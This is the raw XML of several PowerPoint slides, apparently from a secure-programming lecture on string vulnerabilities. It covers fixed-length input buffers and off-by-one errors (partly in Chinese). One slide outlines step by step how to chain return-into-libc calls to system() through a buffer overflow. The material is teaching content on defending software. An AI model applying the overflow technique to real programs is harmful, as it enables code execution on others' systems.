            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{E0F6E99C-AE74-B54E-8819-565C7102562F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- Overflow the buffer to the appropriate offset to 		    overwrite the return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- set up next frame header </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- jump into the system function (1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- return into a leave and return from our function call </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- address of our argument(s) to system function (1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- our argument </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- set up the next frame header </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- jump into the system function (2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- return into a leave and return from our function call </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- address of our argument(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- our argument (2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- restore the original frame header </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>- restore the original value for our program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117062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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{5A65D600-E538-854C-99B6-41ED7211A00E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Strings—such as command-line arguments, environment variables, and console input—are of special concern in secure programming because they comprise most of the data exchanged between an end user and a software system. Graphic and Web-based applications make extensive use of text input fields and, because of standards like XML, data exchanged between programs is increasingly in string form as well. As a result, weaknesses in string representation, string management, and string manipulation have led to a broad range of software vulnerabilities and exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099768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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{2794AE2D-6AD3-B54A-9A8E-92DA31E46C6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>This program reads characters from standard input into a fixed length character array until a newline character is read or an end-of-file (EOF) condition is encountered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Because it is not always possible to know beforehand how many characters a user will supply, it is not possible to statically allocate an array of sufficient length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>A common solution is to statically allocate an array that is much larger than needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>The programmer is only expecting the user to enter eight characters so it is reasonable to assume that the 80 character length will not be exceeded. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>When dealing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> users this fixed length character array can be easily exceeded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412807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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{168524FD-C0A3-0844-BE66-6E0A53801CDD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>The answer is all of them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168928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1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>差一错误</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>是在计数时由于边界条件判断失误导致结果多了一或少了一的错误，通常指计算机编程中</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>循环</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>多了一次或者少了一次的程序错误，属于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>逻辑错误</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>的一种。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、第三句就有问题，也即是导致</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>source[10]=0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>了，而这个部分不是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
